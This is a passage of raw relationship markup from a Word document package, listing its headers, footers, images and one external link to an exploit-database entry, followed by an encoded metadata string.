Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50924" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.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2.jpg"/><Relationship Id="rId2"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9/wHCrZa7af0m7pl9+8W/oQow==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLng1N29rdDNiOW1wajIOaC5yZ3hod2cyemtxbzkyDmguemNydGRwZDhvdHQ3Mg5oLjE3NWY1Y3M5NHowbzgAciExUkhmMm42ZVBrV1pCZnE4Vkd3d3BTNHdXVUp5dXE0ZVA=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